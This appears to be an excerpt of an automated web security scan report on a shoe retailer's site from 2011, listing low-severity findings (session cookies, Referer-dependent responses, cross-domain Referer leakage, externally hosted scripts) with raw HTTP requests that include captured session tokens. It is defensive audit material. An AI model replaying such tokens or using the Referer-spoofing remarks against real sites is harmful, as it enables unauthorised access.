<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcontroller/Feedback HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:12 GMT Server: Apache Edge-control: no-store, max-age=0, downstream-ttl=0 Content-Type: text/html Set-Cookie: Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; path=/; expires=Fri, 18-Feb-2011 15:04:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:44 GMT Server: Apache Set-Cookie: JSESSIONID=88261D90A32BE87D470CEECCE2B32F31; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /womens-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:07:39 GMT Server: Apache Set-Cookie: JSESSIONID=801E0B7D3DD998E97DF2731B5DF9D2F6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /womens-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:53 GMT Server: Apache Set-Cookie: JSESSIONID=50A1CAEC113CD56A797431B1DADA34A8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /womens.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:14 GMT Server: Apache Set-Cookie: JSESSIONID=782429180AC74DF9E2609DCB0D358003; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>W ...[SNIP]...
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.
The response contains the following link to another domain:
http://libs.coremetrics.com/eluminate.js
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /cart?ref=/belts.htm&addStyle=195605 HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /adi-designs-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=A05B6D5F6AACBEF1C01C991EC72E0BA6; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]... <meta name="description" content="Buy adi designs belts with a price guarantee and top rated customer service. You can compare multiple adi designs belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /all-styles.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:37 GMT Server: Apache Set-Cookie: JSESSIONID=27D43EE67EB33747534AA65B18B77EFD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>A ...[SNIP]... <meta name="description" content="Buy all styles with a price guarantee and top rated customer service. You can compare multiple all styles styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /belts-same-day.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:53 GMT Server: Apache Set-Cookie: JSESSIONID=BED340193E83D2D1FCBAC7A24D6465A1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... <meta name="description" content="Buy belts same day with a price guarantee and top rated customer service. You can compare multiple belts same day styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /black-and-white-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:46 GMT Server: Apache Set-Cookie: JSESSIONID=26B9868CD5E763F7DCA26F065B6A7106; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... me="description" content="Buy black and white belts with a price guarantee and top rated customer service. You can compare multiple black and white belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /black-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:22 GMT Server: Apache Set-Cookie: JSESSIONID=35A4B3D4C0F4A493483106046D659817; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... <meta name="description" content="Buy black belts with a price guarantee and top rated customer service. You can compare multiple black belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /blue-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:46 GMT Server: Apache Set-Cookie: JSESSIONID=6A8A93125D2E297FB9100979B66545BA; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... <meta name="description" content="Buy blue belts with a price guarantee and top rated customer service. You can compare multiple blue belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /boston-traveler-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:33 GMT Server: Apache Set-Cookie: JSESSIONID=A67B4166D933EE270DDC03F63D22FCA1; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... me="description" content="Buy boston traveler belts with a price guarantee and top rated customer service. You can compare multiple boston traveler belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /brown-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:05:22 GMT Server: Apache Set-Cookie: JSESSIONID=730D7B82B2B85991A949C66C4D60D3FD; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>B ...[SNIP]... <meta name="description" content="Buy brown belts with a price guarantee and top rated customer service. You can compare multiple brown belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
GET /columbia-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:04 GMT Server: Apache Set-Cookie: JSESSIONID=A936B13B105956F39C66063C8BCF96E7; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>C ...[SNIP]... <meta name="description" content="Buy columbia belts with a price guarantee and top rated customer service. You can compare multiple columbia belts styles and find exactly your size and width."> <script type="text/javascript" src="http://i.shoebuy.com/jscript/facebook.js"></script> ...[SNIP]... <link rel="stylesheet" href="http://i.shoebuy.com/css/productexpress.css" type="text/css" media="all"> <script type="text/javascript" src="http://i.shoebuy.com/jscript/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="http://i.shoebuy.com/jscript/common.js"></script> ...[SNIP]... </script>
